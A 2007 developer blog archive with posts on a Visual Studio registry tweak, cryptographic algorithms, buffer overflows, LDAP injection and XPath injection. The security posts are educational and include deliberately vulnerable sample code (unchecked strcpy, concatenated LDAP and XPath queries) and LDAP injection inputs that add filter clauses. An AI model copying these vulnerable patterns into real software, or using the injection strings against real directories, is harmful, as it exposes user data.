Gopal's Blog: 2007

Tuesday, December 11, 2007

Customize your Find in Files Results in Visual Studio

By default, the Find in Files results window in Visual Studio shows only the file name, with the line number in parentheses, followed by the matching line of code. You can customize these results to show what you want to see and how you want to see it. If you spend a lot of time reformatting these results, this tip may help.

To display Find in Files results in a different format, add a registry setting under:
HKEY_CURRENT_USER\Software\Microsoft\VisualStudio\8.0\Find
The following setting displays each result in this format:
Directory: {Name of the directory}
File Name: {Name of the file}
Line#: {Line number}
Code: {Code snippet}

Go to HKEY_CURRENT_USER\Software\Microsoft\VisualStudio\8.0\Find
Add a new string value called Find result format with a value of Directory : $d\nFile Name : $f$e\nLine #: $l\nCode:$t\r\n where

$d is directory name
$f is the filename
$e is the extension
$l is the line
$t is the text on the line

Note: You don’t have to restart Visual Studio to pick up on your registry changes.
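
To get a feel for how the format string turns into output, the placeholder expansion can be imitated outside Visual Studio. The Python sketch below is only an illustration and is not how Visual Studio itself is implemented: expand_format and the sample values are hypothetical, and it assumes, as the example in this post suggests, that $f and $e together make up the file name.

```python
import re

# Escape sequences used in the format string (backslash followed by a character).
ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "s": " ", "\\": "\\", "$": "$"}

def expand_format(fmt, values):
    """Replace $x placeholders and \\x escapes in fmt (hypothetical helper)."""
    def repl(match):
        if match.group(1) is not None:          # an escape such as \n
            return ESCAPES.get(match.group(1), match.group(0))
        # a placeholder such as $d; unknown placeholders are left untouched
        return str(values.get(match.group(2), match.group(0)))
    return re.sub(r"\\(.)|\$(\w)", repl, fmt)

# The registry value from this post, written as a raw string.
fmt = r"Directory : $d\nFile Name : $f$e\nLine #: $l\nCode:$t\r\n"

# Sample values for one hit (made up for illustration).
hit = {
    "d": "c:\\proj\\",
    "f": "AssemblyInfo",
    "e": ".cs",
    "l": 15,
    "t": '[assembly: AssemblyCulture("")]',
}

result = expand_format(fmt, hit)
print(result)
```
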

Example Results after the above Registry setting:

Find all "[assembly: AssemblyCulture("")]", Whole word, Subfolders, Find Results 1, "c:\poroj\Source Code\PList", "*.*"
Directory : c:\poroj\Source Code\PList\Business Logic\
File Name : AssemblyInfo.cs
Line #: 15
Code:[assembly: AssemblyCulture("")]
Directory : c:\poroj\Source Code\PList\Business Logic\Properties\
File Name : AssemblyInfo.cs
Line #: 15
Code:[assembly: AssemblyCulture("")]

You can also erase or modify the previously typed search strings in the "Look in" combo box on the "Find in Files" search toolbar by editing or deleting the corresponding values under HKEY_CURRENT_USER\Software\Microsoft\VisualStudio\8.0\Find. This is not possible through the Visual Studio UI.

Full list of items you can specify in the registry:

Files:
$p	Path
$f	File name
$v	Drive/UNC name
$d	Directory name
$n	Name
$e	File extension

Location:
$l	Line
$c	Column
$x	End column if on first line, else end of first line
$L	Span end line
$C	Span end column

Text:
$0	Matched text
$t	Text of first line
$s	Summary of hit
$T	Text of spanned lines

Char:
\n	New line
\s	Space
\t	Tab
\\	Backslash
\$	$

Thursday, November 1, 2007

An Overview of Cryptography

Cryptography:

There are many aspects to security and many applications, ranging from secure commerce and payments to private communications and protecting passwords. One essential aspect for secure communications is that of cryptography.

Cryptography is the study of mathematical techniques related to aspects of information security such as confidentiality, data integrity, authentication, and non-repudiation. In simple terms, cryptography is the practice and study of hiding information; it is the science of writing information in secret code, and it is an ancient art. Cryptography is necessary when transmitting secrets or personally identifiable information over any untrusted medium, which includes just about any network, particularly the Internet. While modern cryptography is growing increasingly diverse, it is fundamentally based on problems that are difficult to solve. A problem may be difficult because its solution requires some secret knowledge, such as decrypting an encrypted message or signing a digital document, or because it is intrinsically hard to complete, such as finding a message that produces a given hash value.

The fundamental goal of cryptography is to adequately address the following four areas:

Privacy/Confidentiality:
Providing secrecy is one of the goals of cryptography. It means keeping the content of information from all but those authorized to have it. Put simply, it ensures that no one can read the message except the intended receiver.
Data Integrity:
Assuring the receiver that the received message has not been altered in any way from the original, whether intentionally or otherwise; this addresses the unauthorized alteration of data.
Authentication:
The process of proving one's identity. This applies to both entities and information itself, so this aspect of cryptography is usually subdivided into two major classes: entity authentication and data origin authentication.
Non-repudiation:
A mechanism to prove that the sender really sent the message. It prevents an entity from denying previous commitments or actions.

Types of Cryptographic Algorithms:

There are several ways of classifying cryptographic algorithms. Here they are classified into three types based on the number of keys employed for encryption and decryption, and further defined by their application and use.

Secret Key Cryptography (SKC) / Symmetric Encryption:
It uses a single secret key for both encryption and decryption.
Public Key Cryptography (PKC) / Asymmetric Encryption:
It uses one key for encryption and another for decryption (public and private key pair).
Hash Functions / One-way Cryptography:
It uses a mathematical transformation to irreversibly "encrypt" information.

Secret Key Cryptography (SKC) / Symmetric Encryption:

In secret key (symmetric) cryptography, a single secret key is used for both encryption and decryption, so the key must be shared by sender and receiver. It therefore has to be distributed over a secure medium, and both parties need to keep it secure. The biggest difficulty with this approach is finding an efficient method to agree upon and exchange keys securely; this is referred to as the key distribution problem. Establishing a secret key between two communicating parties when no secure channel already exists between them is a considerable practical obstacle for cryptography users in the real world.

Secret key cryptography schemes are generally divided into two categories:
Stream ciphers:
Stream ciphers operate on a single bit or byte at a time. The transformation applied to successive bits or bytes varies during encryption, typically through some form of feedback mechanism, so the key stream is constantly changing and the encryption transformation can differ for each symbol of plaintext. In situations where transmission errors are highly probable, stream ciphers are advantageous because they have no error propagation: if a digit is corrupted in transmission (rather than added or lost), only a single digit of the plaintext is affected and the error does not spread to other parts of the message. A stream cipher applies simple encryption transformations according to the key stream being used. The key stream can be generated at random, by an algorithm that derives it from a small initial seed, or from a seed and previous ciphertext symbols. Such an algorithm is called a key stream generator.
Stream ciphers come in several flavors, but two are worth mentioning: self-synchronizing stream ciphers and synchronous stream ciphers.
Block ciphers:
A block cipher is an encryption scheme that breaks the plaintext message into blocks of a fixed length and encrypts one block at a time. When encrypting, a block cipher takes a fixed-size block of plaintext as input and outputs a corresponding fixed-size block of ciphertext.
Some symmetric key ciphers are listed below; of these, Triple DES and AES are preferred:

DES (Data Encryption Standard): DES was designed by IBM in the 1970s. It was selected as an official Federal Information Processing Standard (FIPS) for the United States in 1976 and has subsequently enjoyed widespread use internationally. DES is a block cipher employing a 56-bit key that operates on 64-bit blocks. Its complex set of rules and transformations was designed specifically to yield fast hardware implementations and slow software implementations. In 1998, a brute-force attack demonstrated that DES could be broken in practice, which highlighted the need for a replacement algorithm.
3DES (Triple Data Encryption Standard): When it was found that the 56-bit key of DES is not enough to guard against brute-force attacks, TDES was chosen as a simple way to enlarge the key space without switching to a new algorithm. It is a variant of DES that employs up to three 56-bit keys and makes three encryption/decryption passes over the block. In the common encrypt-decrypt-encrypt form this is E(k3; D(k2; E(k1; M))), where M is the message block, E and D are DES encryption and decryption, and k1, k2, and k3 are DES keys. TDES with three different keys has a key length of 168 bits (three 56-bit DES keys); with parity bits, the total storage length is 192 bits.
AES (Advanced Encryption Standard): AES is generally identified with Rijndael, a block cipher designed by Belgian cryptographers Joan Daemen and Vincent Rijmen. AES is not precisely Rijndael, because Rijndael supports a larger range of block and key sizes: AES has a fixed block size of 128 bits and a key size of 128, 192, or 256 bits, whereas Rijndael can be specified with key and block sizes in any multiple of 32 bits, with a minimum of 128 bits and a maximum of 256 bits. AES has been adopted as an encryption standard by the U.S. government, has been analyzed extensively, and is now used widely worldwide.
IDEA (International Data Encryption Algorithm): A secret key cryptosystem written by Xuejia Lai and James Massey in 1992, with a 64-bit block length and a 128-bit key.
Blowfish: A symmetric 64-bit block cipher invented by Bruce Schneier. Optimized for 32-bit processors with large data caches, it is significantly faster than DES on such machines. Key lengths can vary from 32 to 448 bits. Blowfish is freely available and is intended as a substitute for DES or IDEA.
Rivest Ciphers / Ron’s Code (RC1, RC2, RC3, RC4, RC5, and RC6): Among the Rivest ciphers, the algorithms up to RC4 have been found to be breakable. RC5 is a block cipher supporting a variety of block sizes, key sizes, and numbers of encryption passes over the data; when using RC5, larger key sizes and a larger number of passes (eighteen to twenty) are recommended. RC6 is a block cipher that improves on RC5 and was one of the AES Round 2 algorithms.
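
The stream cipher idea described above (a key stream generator expanding a small seed, then a simple per-symbol transformation) can be sketched in a few lines of Python. This is a toy for illustration only and must not be used to protect real data: the SHA-256 counter construction, the function names, and the sample seed are all assumptions of this sketch, not any of the ciphers listed above.

```python
import hashlib

def keystream(seed: bytes, length: int) -> bytes:
    """Toy key stream generator: expand a small seed into `length` bytes."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        # Hash the seed together with a running counter to get the next chunk.
        out += hashlib.sha256(seed + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])

def xor_stream(data: bytes, seed: bytes) -> bytes:
    """Encrypt or decrypt by XOR-ing each byte with the key stream."""
    return bytes(d ^ k for d, k in zip(data, keystream(seed, len(data))))

seed = b"shared secret seed"          # hypothetical shared key
message = b"attack at dawn"
ciphertext = xor_stream(message, seed)
decrypted = xor_stream(ciphertext, seed)   # the same operation decrypts

# Corrupt one ciphertext byte "in transit": only that plaintext byte is damaged.
corrupted = bytearray(ciphertext)
corrupted[3] ^= 0x01
damaged = xor_stream(bytes(corrupted), seed)
differing = [i for i in range(len(message)) if damaged[i] != message[i]]
print(decrypted, differing)
```

The last lines illustrate the "no error propagation" property: flipping a bit in one ciphertext byte changes only the plaintext byte at the same position.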

Public Key Cryptography (PKC) / Asymmetric Encryption:

Public Key Cryptography was first described publicly by Stanford University professor Martin Hellman and graduate student Whitfield Diffie in 1976. It involves a key pair: two mathematically related keys, designated the public key and the private key, with which two parties can communicate securely over a non-secure channel without having to share a secret key. Knowledge of one key does not allow someone to easily determine the other. This makes it possible for sender and receiver to simply send their public keys to one another, even if the channel they are using to do so is insecure. One key is used to encrypt the plaintext and the other key is used to decrypt the ciphertext.
In simple words, if the public key is used to encrypt some data, it can be decrypted only with the corresponding private key. Similarly, if the private key is used to encrypt some data, it can be decrypted only with the corresponding public key. This mechanism is also called asymmetric encryption.
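
The two directions described above can be tried out with textbook RSA on deliberately tiny numbers. The sketch below is only an illustration: the primes, the exponent, and the helper name apply_key are choices made for this example, and real systems use keys of thousands of bits together with padding schemes that are omitted here.

```python
# Toy key generation with very small primes (illustration only).
p, q = 61, 53
n = p * q                    # modulus, part of both keys
phi = (p - 1) * (q - 1)
e = 17                       # public exponent
d = pow(e, -1, phi)          # private exponent (modular inverse, Python 3.8+)

def apply_key(value: int, exponent: int, modulus: int = n) -> int:
    """Raise value to the key's exponent modulo n."""
    return pow(value, exponent, modulus)

message = 65

# Encrypt with the public key, decrypt with the private key.
ciphertext = apply_key(message, e)
recovered = apply_key(ciphertext, d)

# Apply the private key first (as in signing), undo it with the public key.
signature = apply_key(message, d)
verified = apply_key(signature, e)

print(ciphertext, recovered, verified)
```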

Compared with symmetric-key encryption, public-key encryption requires more computation and is therefore much slower, so it is not appropriate for large amounts of data. Commonly, PKC is used to transmit secret keys between the parties, who then use those keys to encrypt their further communications. A central problem for public key cryptography is proving that a public key is authentic and has not been tampered with or replaced by a malicious third party. The usual approach to this problem is to have third parties known as certificate authorities certify ownership of key pairs.

Some of the asymmetric key algorithms are as follows:
RSA (Rivest, Shamir, Adleman Algorithm): Ronald Rivest, Adi Shamir, and Leonard Adleman developed this algorithm, hence the name RSA. It uses a variable size encryption block and a variable size key. Unlike some other algorithms, RSA can be used for key exchange, digital signatures, and the encryption of small blocks of data. RSA is a cipher based on the concept of a trapdoor function: a function that is easily calculated but whose inverse is extremely difficult to calculate. RSA's mathematical hardness comes from the ease of multiplying large prime numbers and the difficulty of finding the prime factors of the resulting large number.
Diffie-Hellman: The Diffie-Hellman algorithm was developed by Diffie and Hellman in 1976 and published in the paper "New Directions in Cryptography". The protocol allows two users to establish a shared secret key over an insecure medium without any prior secrets. This key can then be used to encrypt subsequent communications using a symmetric key cipher. The algorithm works in the multiplicative group of integers modulo p, where p is prime and g is a primitive root mod p; p and g are public system parameters. For example, Alice chooses a secret integer a and sends A = g^a mod p to Bob, and Bob chooses a secret integer b and sends B = g^b mod p to Alice. The values a and b are the private keys, while A and B are openly shared and act as the public keys. From their own private key and the public key learned from the other party, Alice and Bob each compute the same secret, B^a mod p = A^b mod p = g^(ab) mod p. This derived key is later used as an encryption key for further communication.
Digital Signature Algorithm (DSA): The algorithm specified in NIST's Digital Signature Standard (DSS) provides digital signature capability for the authentication of messages. Because DSA authenticates both the identity of the signer and the integrity of the signed information, it can be used in a variety of applications such as mail and electronic funds transfer.
Elliptic Curve Cryptography (ECC): A PKC algorithm based upon elliptic curves, designed for devices with limited compute power and/or memory, such as smartcards and PDAs. ECC was proposed in 1985 by cryptographers Victor Miller (IBM) and Neal Koblitz (University of Washington). It is based on the difficulty of solving the Elliptic Curve Discrete Logarithm Problem: given two points, P and Q, on an elliptic curve, find the integer n, if it exists, such that P = nQ. ECC can offer levels of security comparable to RSA and other PKC methods with much smaller keys.
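
The Diffie-Hellman exchange described above can be followed step by step with small numbers. The Python sketch below is a toy under stated assumptions: the parameters p = 23 and g = 5 and the private values 6 and 15 are chosen here purely for illustration, and real deployments use primes of 2048 bits or more.

```python
# Public system parameters (toy sizes): prime p and primitive root g mod p.
p, g = 23, 5

# Private keys, chosen secretly by each party (fixed here for the example).
a = 6     # Alice
b = 15    # Bob

# Public keys, sent openly over the insecure channel.
A = pow(g, a, p)    # Alice -> Bob
B = pow(g, b, p)    # Bob -> Alice

# Each side combines its own private key with the other side's public key.
alice_secret = pow(B, a, p)
bob_secret = pow(A, b, p)

print(A, B, alice_secret, bob_secret)
```

Both parties end up with the same value without ever transmitting a or b; an eavesdropper who sees only p, g, A, and B would have to solve a discrete logarithm to recover it.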

Hash Functions / One-way Cryptography:

The essential cryptographic properties of a hash function are that it is both one-way and collision-free. It uses a mathematical transformation to irreversibly "encrypt" information. Hashing is the transformation of a string of characters into a usually shorter, fixed-length value, called the hash value, that represents the original string. The algorithm that performs the transformation is called the hash function. In addition to enabling faster data retrieval, hashing is also used in creating and verifying digital signatures.
The most basic attack we might mount on a hash function is to choose inputs at random until either we find an input that gives the target output value we are looking for (thereby contradicting the one-way property), or we find two inputs that produce the same output (thereby contradicting the collision-free property). A good hash function should not produce the same hash value from two different inputs; when it does, this is known as a collision. A hash function that offers an extremely low risk of collision may be considered acceptable. To resist attacks that depend on brute-force methods, the output of the hash function must be sufficiently long.
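
Why the output must be "sufficiently long" can be seen by deliberately shortening a hash and brute-forcing a collision. The following Python sketch is an illustration under assumptions of its own: short_hash truncates SHA-256 to two bytes (a made-up construction for this example), so with only 65,536 possible outputs a collision is guaranteed to turn up quickly.

```python
import hashlib

def short_hash(data: bytes, size: int = 2) -> bytes:
    """A deliberately weak hash: the first `size` bytes of SHA-256."""
    return hashlib.sha256(data).digest()[:size]

def find_collision(size: int = 2):
    """Try inputs 0, 1, 2, ... until two of them share a short hash."""
    seen = {}
    counter = 0
    while True:
        candidate = str(counter).encode()
        tag = short_hash(candidate, size)
        if tag in seen:
            return seen[tag], candidate
        seen[tag] = candidate
        counter += 1

first, second = find_collision()
print(first, second, short_hash(first).hex())
```

With the full 256-bit output the same search would be hopeless, which is the point the paragraph above makes about digest length.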

Some of the Hash functions are as follows:
Message Digest (MD) algorithms: A series of byte-oriented algorithms that produce a 128-bit hash value from an arbitrary-length message.

MD2: Developed by Rivest in 1989. The message is first padded so that its length in bytes is divisible by 16. A 16-byte checksum is then appended to the message, and the hash value is computed on the resulting message. It creates a 128-bit hash value from input of any length. It is optimized for 8-bit machines and designed for systems with limited memory, such as smart cards. Collisions for MD2 can be constructed if the calculation of the checksum is omitted; this is the only cryptanalytic result known for MD2.
MD4: Developed by Rivest in 1990. The message is padded so that its length in bits is congruent to 448 modulo 512 (that is, its length plus 64 is divisible by 512). A 64-bit binary representation of the original length of the message is then concatenated to the message. The message is processed in 512-bit blocks in the Damgård/Merkle iterative structure, and each block is processed in three distinct rounds. MD4 is designed specifically for fast processing in software and is optimized for 32-bit machines. MD4 should now be considered broken.
MD5: Developed by Rivest in 1991, after potential weaknesses were reported in MD4. It is basically MD4 with "safety-belts": it is slightly slower than MD4 but more secure. The algorithm consists of four distinct rounds, which have a slightly different design from that of MD4. The message-digest size and the padding requirements remain the same, and it is also optimized for 32-bit machines. Den Boer and Bosselaers found pseudo-collisions for MD5, and full collisions were demonstrated in 2004, so MD5 should no longer be relied on where collision resistance matters.

Secure Hash Algorithm (SHA): The Secure Hash Algorithm, specified in the Secure Hash Standard (SHS), was developed by NIST (National Institute of Standards and Technology, a division of the U.S. Department of Commerce, formerly known as the National Bureau of Standards (NBS)) and published as a federal information processing standard. SHA-1 was a revision to SHA that was published in 1994. The revision corrected an unpublished flaw in SHA. Its design is very similar to the MD4 family of hash functions developed by Rivest. It takes a message of less than 2 to the power of 64 bits in length and produces a 160-bit message digest. The algorithm is slightly slower than MD5, but the larger message digest makes it more secure against brute-force collision and inversion attacks.
Whirlpool: Designed by Vincent Rijmen and Paulo S. L. M. Barreto, it operates on messages less than 2 to the power of 256 bits in length and produces a message digest of 512 bits. Historically, Whirlpool has had three versions: the first, WHIRLPOOL-0; its successor, WHIRLPOOL-T; and the current WHIRLPOOL. Whirlpool was adopted by the International Organization for Standardization (ISO) in the ISO/IEC 10118-3:2004 standard.
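
The digest sizes quoted above are easy to check with Python's standard hashlib module. This is just a quick sketch: the sample messages are arbitrary, and only MD5 and SHA-1 are shown because they are always present in hashlib, whereas the other algorithms in the list may or may not be available depending on how Python was built.

```python
import hashlib

digest_bits = {}
for name in ("md5", "sha1"):
    for message in (b"", b"abc", b"a much longer message " * 100):
        h = hashlib.new(name, message)
        # The digest length depends only on the algorithm, not on the input.
        digest_bits.setdefault(name, set()).add(h.digest_size * 8)

print(digest_bits)
print(hashlib.md5(b"abc").hexdigest())
print(hashlib.sha1(b"abc").hexdigest())
```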

Saturday, October 20, 2007

An Overview Of Buffer Overflows / Buffer Overruns

Buffer Overflows (Buffer Overrun):

A buffer overrun occurs when a process tries to copy more data into a buffer than the buffer was intended to hold. Buffer overruns can occur in stack memory or in heap memory. In buffer overflow attacks, the extra data may contain code designed to trigger specific actions that could damage the user's files, corrupt or overwrite valid data, or disclose confidential information.

Buffer overflows are not easy to discover, and even when one is discovered it is generally extremely difficult to exploit. Buffer overflows found in widely used server products are likely to become widely known and can pose a significant risk to users of these products. Such flaws are much harder to discover in an application's custom code, and the risk there is more moderate, because the source code and detailed error messages are normally not available to the attacker, who can then do little more than crash the application.

Attackers use buffer overflows to corrupt the execution stack of a web application. By sending specially crafted input to a web application, an attacker can cause it to execute arbitrary code of the attacker's choice. With this attack an attacker can perform actions including, but not limited to, the following:

Creating unauthorized user or administrator accounts
Creating unprotected entry points into a system (“back-doors”)
Disabling protective devices such as firewalls or antivirus solutions
Running arbitrary code instead of legitimate code

Background:

In a classic buffer overflow exploit, the attacker sends data to a program that has this vulnerability, and the program stores it in an undersized stack buffer, overwriting information on the call stack, including the function's return pointer. The attacker's data sets the return pointer so that it points back into the buffer holding the attacker's code, so when the function returns, it transfers control to the malicious code contained in the attacker's data. There are a variety of other types of buffer overflow, including heap buffer overflows and off-by-one errors, among others. Another very similar class of flaws is the format string attack. All these conditions occur because code does not check whether the buffer being copied into has been allocated enough space for the data being copied.

An application or component implemented in an unmanaged language, native code, or any language that is not deemed “memory safe” is vulnerable to buffer overflows when user input is blindly copied into buffer structures without first being validated for length and type. Managed languages such as C# and Java are generally not susceptible to buffer overrun conditions. Managed code makes buffer overruns extremely difficult to encounter, but not impossible: for example, managed code can call into unmanaged code, and overruns can occur there.

In Detail:

A buffer is a contiguous allocated chunk of memory. In many unmanaged languages there is no automatic bounds checking on buffers, which means a program can write past the end of a buffer. Consider the following example:

int main()
{
    int stackbuff[20];   /* valid indexes are 0 through 19 */
    stackbuff[25] = 5;   /* out-of-bounds write: undefined behavior */
    return 0;
}

The above program compiles without errors, yet it writes beyond the memory allocated for the buffer: only 20 integer elements are allocated to the variable “stackbuff”, but the value 5 is written at index 25, which lies outside the allocation and might result in unexpected behavior.

How does an attacker exploit buffer overflows?

A stack is a contiguous chunk of memory. A register called the stack pointer (SP) points to the top of the stack, while the bottom of the stack is at a fixed address. The size of the stack is adjusted dynamically at runtime. Whenever a function call is made, the following are pushed onto the stack in this order: first the function parameters, then the address to be executed after the function returns, then a frame pointer (FP), followed by the local variables of the function. All of these are cleaned up from the stack when the function terminates.

For example, consider the following code:

int sumofvalues(int x, int y, int z)
{
    int sum = 0;
    sum = x + y + z;
    return sum;
}

Whenever the above function is executed, the stack looks like this:

First the three function parameters x, y, and z are pushed onto the stack, then the return address, then the frame pointer, followed by the local variable sum.

Suppose your application has a function like the one below:

#include <string.h>

void funccpy(char *source)
{
    char destination[20];
    /* Vulnerable: strcpy() does not check that source fits in destination */
    strcpy(destination, source);
}

This function is later called with a string of characters to be copied into another string. It works fine as long as the string passed in, including its terminating null character, fits within 20 bytes. But what happens if the string is longer than that? The extra bytes run past the buffer allocated for the “destination” variable and overwrite the space allocated for the FP, the return address, and so on. Using this vulnerability, an attacker can execute code of his choice by overwriting the return address. For example, the attacker can place arbitrary code in the overflowing area of the buffer and then overwrite the return address so that it points back into the buffer and executes that code. Such arbitrary code can be inserted into the program through its input parameters.

Recommendations / Countermeasures:

For each instance where user input is copied or concatenated into a buffer, validate the size of the input before the copy. If the user input exceeds the allocated space of the destination buffer, do not perform the copy; return with an error instead.
Source code and binaries should be scanned with source code analysis and binary analysis tools, respectively, to detect common buffer overrun conditions.
The choice of programming language can have a great effect on the occurrence of buffer overflows. Many programming languages provide runtime bounds checking, which can issue a warning or raise an exception when a write would go past the end of a buffer.
Try to avoid using unmanaged code. Where it is necessary, use the secure variants of functions in place of unsafe functions such as strcpy(), strcat(), and so on.
Keep systems up to date with the latest security patches.
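
Two of the recommendations above, validating the input size before copying and relying on runtime bounds checking, can be sketched in Python, a language that performs such checks itself. This is only an illustration of the idea, not a fix for the C code: checked_copy and BUFFER_SIZE are hypothetical names, with the 20-byte size chosen to mirror the “destination” buffer from the earlier example.

```python
BUFFER_SIZE = 20  # mirrors the 20-byte "destination" buffer in the C example

def checked_copy(destination: bytearray, source: bytes) -> None:
    """Copy source into destination only if it fits; otherwise refuse."""
    if len(source) > len(destination):
        raise ValueError(
            f"input of {len(source)} bytes exceeds buffer of {len(destination)} bytes"
        )
    destination[:len(source)] = source

destination = bytearray(BUFFER_SIZE)
checked_copy(destination, b"short input")      # fits, so it is copied

try:
    checked_copy(destination, b"A" * 64)       # too long: rejected, nothing copied
    oversized_rejected = False
except ValueError:
    oversized_rejected = True

# Runtime bounds checking: the out-of-range write from the earlier C example
# raises an exception here instead of silently corrupting memory.
stackbuff = [0] * 20
try:
    stackbuff[25] = 5
    out_of_bounds_caught = False
except IndexError:
    out_of_bounds_caught = True

print(oversized_rejected, out_of_bounds_caught)
```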

Wednesday, October 17, 2007

One of the Code Injection Attacks: LDAP Injection

LDAP Injection:

LDAP Injection is an attack technique used to exploit web sites that construct LDAP statements from unvalidated user-supplied input. Using this attack, the attacker can execute arbitrary statements against the directory services. LDAP injection is possible whenever an application constructs dynamic LDAP statements from unvalidated or unsanitized user input to access directory services.

What Is LDAP?

Lightweight Directory Access Protocol (LDAP) is an open-standard protocol for both querying and manipulating directory services running over TCP/IP. LDAP was designed at the University of Michigan to adapt a complex enterprise directory system (called X.500) to the modern Internet. Just as a database management system processes queries and updates to a relational database, an LDAP server processes queries and updates to an LDAP information directory. An LDAP session starts when a client connects to an LDAP server. After establishing the connection, the client sends operation requests to the server, and the server sends responses in turn. The server may send the responses in any order, and with few exceptions the client need not wait for a response before sending the next request. The LDAP protocol is both cross-platform and standards-based. LDAP directory servers store their data hierarchically, and LDAP directories are heavily optimized for read performance. LDAP allows you to securely delegate read and modification authority based on your specific needs using Access Control Instances (ACIs).

In Detail:

LDAP Injection attacks are not as common as other types of injection attacks such as SQL Injection. However, an LDAP Injection can occur anywhere the underlying code uses unvalidated user input in LDAP searches or queries.

The most common use of LDAP in web applications is to let users search for specific data easily. For example, an LDAP-enabled Web application looks up information about a user by accepting the user name as input and using it in a search query. The underlying code takes this input and dynamically generates the LDAP query that is used to search the LDAP database. The search query within the code may look like this:

// Vulnerable: user input is placed in the filter without validation
string uName = txtSearch.Text;
string searchQuery = "(cn=" + uName + ")";
ldapObj.DN = "ou=customers,dc=example,dc=com";
ldapObj.SearchFilter = searchQuery;

If the variable uName is not properly validated, LDAP injection becomes possible. An attacker can use this vulnerability in ways including, but not limited to, the following:

If an attacker enters * as the input, the resulting LDAP statement makes the server return any object that contains a “cn” attribute; in other words, it returns every username in the LDAP database.
If an attacker enters xxx)((acno=*) as the input, the underlying LDAP search query becomes (cn=xxx)((acno=*)), which would reveal the account number of user xxx.
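
The effect of the two inputs above on the filter string can be reproduced with plain string concatenation. The Python sketch below is only an illustration: build_filter_naive is a hypothetical stand-in for the application's query-building code, and no LDAP server is contacted.

```python
def build_filter_naive(user_input: str) -> str:
    """Build the search filter by plain concatenation (the vulnerable pattern)."""
    return "(cn=" + user_input + ")"

# A normal user name, followed by the two malicious inputs discussed above.
for text in ["jsmith", "*", "xxx)((acno=*)"]:
    print(repr(text), "->", build_filter_naive(text))
```

In each case the characters typed by the user end up as part of the filter syntax itself, which is what allows the input to change the meaning of the query.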

There are many other possibilities open to an attacker, depending on how the LDAP query is constructed and what the application does with its results. An attacker can start by sending a few requests containing unusual characters to see how the application reacts and to identify the type of validation performed in the target application's code. The attacker then continues by reverse-engineering the structure of the LDAP query to determine how the user-supplied data is used in the search. Some applications use LDAP queries to authenticate users; in such cases the authentication mechanism can be bypassed easily.

Countermeasures / Preventions:

LDAP Injection is one kind of code injection attack, so it can be prevented in the same way as the others.
Input Validation: This is the best measure to defend applications from LDAP injection attacks. The underlying code needs to verify input against a white list so that the application accepts only legitimate input. If the input is checked against a white list using a regular expression, malicious input can be rejected.
In addition, all data returned to the user should be validated, and the amount of data returned by queries should be restricted as an added layer of security.
Please refer to my previous posting on Input Validation for more details.
LDAP Server Configuration: Implementing tight access control on the data in the LDAP directory is vital when configuring the permissions on user objects. The access level used by the Web application to connect to the LDAP server should be restricted to the minimum required. In addition, the LDAP server should not be directly exposed on the Internet, which reduces the attack surface.
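
The white-list check described above can be sketched as follows. This Python sketch makes several assumptions that are not part of the post: the allowed character set and length limit are examples only, the function names are hypothetical, and the additional escaping step follows the character escapes defined for LDAP search filters in RFC 4515 as a second line of defense.

```python
import re

# White list: letters, digits, dot, underscore, hyphen; 1 to 64 characters.
# (Example policy only; adjust to what legitimate user names look like.)
_USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")

# Characters with special meaning in LDAP search filters and their escapes.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

def is_valid_username(value: str) -> bool:
    """Accept only input that matches the white list in full."""
    return _USERNAME_RE.fullmatch(value) is not None

def escape_filter_value(value: str) -> str:
    """Escape filter metacharacters so they are treated as literal text."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)

def build_filter(user_input: str) -> str:
    """Validate first, then escape, then build the filter."""
    if not is_valid_username(user_input):
        raise ValueError("input rejected by white list")
    return "(cn=" + escape_filter_value(user_input) + ")"

print(build_filter("jsmith"))
for attack in ["*", "xxx)((acno=*)"]:
    try:
        build_filter(attack)
    except ValueError as err:
        print(repr(attack), "->", err)
```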

Wednesday, October 10, 2007

Code Injection: XPath Injection

XPath Injection:

SQL injection is the most popular type of code injection attack, but there are several others that can be just as dangerous to your applications and your data, including LDAP injection and XPath injection. An ‘XPath injection’ attack is similar to an SQL injection attack, but its target is an XML document rather than an SQL database. ‘XPath Injection’ is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.

What is XML?

XML stands for Extensible Markup Language and was designed to describe data. It allows programmers to create their own customized tags to store data. In XML the data is stored in nodes in a tree form. XML Path or XPath language is used for querying information from the nodes of an XML document. Please refer to XML Tutorial for more details on XML.

What is XPath?

“XML Path” or “XPath” 1.0 is a language used to refer to parts of an XML document. Path expressions are used to access elements and attributes in an XML document, which return a node-set, a string, a Boolean or a number. It can be used directly to query an XML document by an application, or as part of a larger operation such as applying an XSLT transformation to an XML document, or applying an XQuery to an XML document. Please refer to XPath Tutorial for more details on XPath.

In Detail:

Code injection is a technique for injecting code into a program or application by taking advantage of the unchecked assumptions the application makes about its inputs, in order to bypass or modify the originally intended functionality of the code. All code injection attacks work in the same way: an attacker injects malicious code into the application through one of its input fields. So, to perform such attacks there must be entry points that do not perform adequate validation.
Consider a Web application that uses XPath to query an XML document and retrieve the social security number of a customer, based on the name and password values supplied by the user of the application. If the application embeds these values directly in the XPath query, then it is vulnerable to XPath injection.

For Example:

An application stores customer data in “CustProfile.xml”, which looks like this:

<?xml version="1.0" encoding="utf-8"?>
<Customers>
  <Customer>
    <CLogIn>Malapati</CLogIn>
    <CName>Pradeep Malapati</CName>
    <Email>pradeep.malapati@malapaticorp.com</Email>
    <Pwd>Malapati2020</Pwd>
    <SSN>xxxxxxxxxxxx</SSN>
    <ACNO>11111111111</ACNO>
  </Customer>

  <Customer>
    <CLogIn>Vijaya</CLogIn>
    <CName>Vijaya Gavuji</CName>
    <Email>Vijaya.Gavuji@vigavinc.com</Email>
    <Pwd>Vigav1010</Pwd>
    <SSN>xxxxxxxxxxxx</SSN>
    <ACNO>99999999999</ACNO>
  </Customer>
  <!-- more Customer records -->
</Customers>

The application uses code like the following to retrieve the Social Security Number of the customer:

// Requires: using System; using System.Xml; using System.Xml.XPath;
XmlDocument XmlDoc = new XmlDocument();
XmlDoc.Load("CustProfile.xml");
...
XPathNavigator custnav = XmlDoc.CreateNavigator();
// VULNERABLE: the text box values are concatenated straight into the XPath expression.
